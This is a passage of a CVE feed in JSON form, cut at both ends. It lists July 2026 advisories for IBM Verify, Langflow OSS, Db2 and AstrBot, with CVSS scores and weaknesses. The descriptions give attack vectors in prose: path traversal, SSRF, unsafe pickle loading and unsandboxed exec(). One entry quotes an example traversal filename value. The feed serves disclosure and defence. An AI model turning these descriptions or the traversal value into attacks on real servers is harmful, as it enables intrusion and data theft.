Modified":"2026-07-17T20:17:29.203","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 and IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability. An attacker could exploit this vulnerability using a specially crafted request to redirect a victim to arbitrary Web sites."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Verify Identity Access","cpes":["cpe:2.3:a:ibm:verify_identity_access:11.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access:11.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access:11.0.2:*:*:*:*:*:*:*"],"versions":[{"version":"11.0","lessThanOrEqual":"11.0.2","versionType":"semver","status":"affected"}]},{"vendor":"IBM","product":"Security Verify Access","cpes":["cpe:2.3:a:ibm:security_verify_access:10.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access:10.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access:10.0.9.1:*:*:*:*:*:*:*"],"versions":[{"version":"10.0","lessThanOrEqual":"10.0.9.1","versionType":"semver","status":"affected"}]},{"vendor":"IBM","product":"Verify Identity Access Container","cpes":["cpe:2.3:a:ibm:verify_identity_access_container:11.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access_container:11.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access_container:11.0.2:*:*:*:*:*:*:*"],"versions":[{"version":"11.0","lessThanOrEqual":"11.0.2","versionType":"semver","status":"affected"}]},{"vendor":"IBM","product":"Security Verify Access Container","cpes":["cpe:2.3:a:ibm:security_verify_access_container:10.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access_container:10.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access_container:10.0.9.1:*:*:*:*:*:*:*"],"versions":[{"version":"10.0","lessThanOrEqual":"10.0.9.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","baseScore":3.1,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":1.6,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-601"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279510","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-7667","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:29.350","lastModified":"2026-07-17T20:17:29.350","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 allows an authenticated attacker to create a malicious flow pointing to an attacker-controlled URL that returns a specially crafted Content-Disposition header (e.g., filename=\"../../../target/path\" ), enabling arbitrary file write operations with attacker-controlled content to any path accessible by the Langflow process."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278931","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-7754","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:29.470","lastModified":"2026-07-17T20:17:29.470","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 Langflow 1.9.0 could allow server-side request forgery (SSRF) due to insecure default configuration and incomplete enforcement of the SSRF protection mechanism."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":4.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:41:00.760534Z","id":"CVE-2026-7754","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://www.ibm.com/support/pages/node/7278930","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-7755","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:30.137","lastModified":"2026-07-18T00:16:48.333","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 Langflow could allow remote code execution due to incomplete validation enforcement on MCP server configuration files."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T20:05:27.959163Z","id":"CVE-2026-7755","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://www.ibm.com/support/pages/node/7278932","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-7771","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:30.247","lastModified":"2026-07-17T20:17:30.247","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to a trap when compiling a specially crafted statements containing subqueries could lead to a denial of service."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Db2","cpes":["cpe:2.3:a:ibm:db2:11.5.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:db2:11.5.9:*:*:*:*:*:*:*","cpe:2.3:a:ibm:db2:12.1.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:db2:12.1.4:*:*:*:*:*:*:*"],"versions":[{"version":"11.5.0","lessThanOrEqual":"11.5.9","versionType":"semver","status":"affected"},{"version":"12.1.0","lessThanOrEqual":"12.1.4","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-835"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279480","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-7872","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:30.377","lastModified":"2026-07-17T20:17:30.377","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 allows an authenticated attacker to read arbitrary files including the JWT signing key and forge authentication tokens for any user."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278934","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-8056","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:30.500","lastModified":"2026-07-17T20:17:30.500","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 allows authenticated users to override component parameters at runtime via the API. A critical security flaw exists in the parameter filtering mechanism within the `apply_tweaks()` function."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278933","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-8476","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:30.623","lastModified":"2026-07-17T20:17:30.623","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 contain a critical remote code execution vulnerability in the disk-based caching mechanism. The AsyncDiskCache class uses Python's unsafe pickle.loads() function to deserialize cached objects from disk without validation, integrity verification, or authentication, enabling arbitrary code execution when malicious pickle payloads are processed. Attackers who can influence cached data through file system access, malicious workflow inputs, custom components, or API manipulation can achieve complete system compromise with the privileges of the Langflow server process."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","baseScore":9.9,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.1,"impactScore":6.0}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-502"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278922","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-8481","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:30.747","lastModified":"2026-07-17T20:17:30.747","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 contain a critical remote code execution vulnerability in the code validation API endpoint. The POST /api/v1/validate/code endpoint accepts user-supplied Python code and executes it directly using Python's built-in exec() function without sandboxing, input validation, or privilege restrictions, enabling any authenticated user to execute arbitrary system commands with the full privileges of the Langflow server process."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","baseScore":9.9,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.1,"impactScore":6.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T19:40:33.659580Z","id":"CVE-2026-8481","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278923","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-8505","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:31.417","lastModified":"2026-07-18T00:16:48.433","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 has a vulnerability in Langflow's webhook authentication logic allows unauthenticated users to trigger the execution of any flow. The system incorrectly bypasses API key validation when the WEBHOOK_AUTH_ENABLE configuration is set to False (which is the default setting). This allows a remote attacker who knows a flow's UUID to execute it as if they were the owner, potentially leading to Remote Code Execution (RCE)."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T20:05:54.903179Z","id":"CVE-2026-8505","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"references":[{"url":"https://www.ibm.com/support/pages/node/7278921","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-8635","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:31.527","lastModified":"2026-07-17T20:17:31.527","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 allows authenticated users to escalate privileges to superuser by directly manipulating the database, execute arbitrary system commands, and achieve full system compromise with Langflow service permissions."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","baseScore":9.9,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.1,"impactScore":6.0}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278925","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-8859","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:31.643","lastModified":"2026-07-17T20:17:31.643","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.0 Langflow could allow an attacker to write arbitrary files to unintended locations due to improper input validation in the APIRequest component. A path traversal vulnerability exists when the \"Save to File\" feature is enabled, where filenames extracted from HTTP response Content-Disposition headers are not sanitized before being joined to the temporary directory path. An attacker controlling an external HTTP server can supply crafted filename values containing path traversal sequences (e.g., ../), enabling arbitrary file writes to locations accessible by the Langflow process."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.0:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.0","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","baseScore":9.9,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.1,"impactScore":6.0}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7278924","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-8861","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T20:17:31.760","lastModified":"2026-07-17T20:17:31.760","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Security Verify could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser.  This information could be used in further attacks against the system."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Verify Identity Access","cpes":["cpe:2.3:a:ibm:verify_identity_access:11.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access:11.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access:11.0.2:*:*:*:*:*:*:*"],"versions":[{"version":"11.0","lessThanOrEqual":"11.0.2","versionType":"semver","status":"affected"}]},{"vendor":"IBM","product":"Security Verify Access","cpes":["cpe:2.3:a:ibm:security_verify_access:10.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access:10.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access:10.0.9.1:*:*:*:*:*:*:*"],"versions":[{"version":"10.0","lessThanOrEqual":"10.0.9.1","versionType":"semver","status":"affected"}]},{"vendor":"IBM","product":"Verify Identity Access Container","cpes":["cpe:2.3:a:ibm:verify_identity_access_container:11.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access_container:11.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:verify_identity_access_container:11.0.2:*:*:*:*:*:*:*"],"versions":[{"version":"11.0","lessThanOrEqual":"11.0.2","versionType":"semver","status":"affected"}]},{"vendor":"IBM","product":"Security Verify Access Container","cpes":["cpe:2.3:a:ibm:security_verify_access_container:10.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access_container:10.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:security_verify_access_container:10.0.9.1:*:*:*:*:*:*:*"],"versions":[{"version":"10.0","lessThanOrEqual":"10.0.9.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-209"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279510","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-13445","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T21:17:05.473","lastModified":"2026-07-17T21:17:05.473","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.1 can allow an authenticated attacker to exploit the SaveToFile component to read and modify another user's uploaded files by specifying absolute paths pointing to victim storage locations. In append mode, the attacker's workflow reads victim file contents, appends attacker-controlled data, and uploads a copy containing victim data to the attacker's namespace (confidentiality breach). In overwrite mode, the attacker can replace victim file contents with arbitrary data (integrity breach). This breaks the storage ownership boundary between users."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.1:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","baseScore":8.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":5.2}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279990","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-13446","sourceIdentifier":"psirt@us.ibm.com","published":"2026-07-17T21:17:05.960","lastModified":"2026-07-17T21:17:05.960","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"IBM Langflow OSS 1.0.0 through 1.10.1 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data."}],"affected":[{"source":"psirt@us.ibm.com","affectedData":[{"vendor":"IBM","product":"Langflow OSS","cpes":["cpe:2.3:a:ibm:langflow_oss:1.0.0:*:*:*:*:*:*:*","cpe:2.3:a:ibm:langflow_oss:1.10.1:*:*:*:*:*:*:*"],"versions":[{"version":"1.0.0","lessThanOrEqual":"1.10.1","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"psirt@us.ibm.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@us.ibm.com","type":"Primary","description":[{"lang":"en","value":"CWE-798"}]}],"references":[{"url":"https://www.ibm.com/support/pages/node/7279991","source":"psirt@us.ibm.com"}]}},{"cve":{"id":"CVE-2026-16074","sourceIdentifier":"cna@vuldb.com","published":"2026-07-17T21:17:06.087","lastModified":"2026-07-17T21:17:06.087","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was detected in AstrBotDevs AstrBot up to 4.25.2. This affects the function update_plugin/update_all_plugins of the file astrbot/dashboard/routes/plugin.py of the component Plugin Update Handler. The manipulation of the argument download_url/download_urls/proxy results in server-side request forgery. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}],"affected":[{"source":"cna@vuldb.com","affectedData":[{"vendor":"AstrBotDevs","product":"AstrBot","cpes":["cpe:2.3:a:astrbot:astrbot:*:*:*:*:*:*:*:*"],"modules":["Plugin Update Handler"],"versions":[{"version":"4.25.0","status":"affected"},{"version":"4.25.1","status":"affected"},{"version":"4.25.2","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.1,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_